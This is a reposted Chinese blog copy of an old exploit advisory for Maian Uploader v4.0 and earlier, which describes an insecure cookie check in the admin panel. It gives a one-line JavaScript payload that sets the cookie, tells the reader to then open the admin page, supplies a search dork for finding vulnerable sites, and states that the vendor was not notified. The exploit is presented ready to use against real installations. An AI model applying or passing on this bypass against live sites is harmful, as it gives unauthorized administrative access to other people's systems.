Maian Uploader

时间：2015-12-15 10:06:31 阅读：183 评论：0 收藏：0 [点我收藏+]

-[*] ================================================================================ [*]-
-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by: Maian Uploader v4.0

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie

exists.
and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "uploader_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-
-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-

Maian Uploader

原文：http://www.jb51.net/hack/5657.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)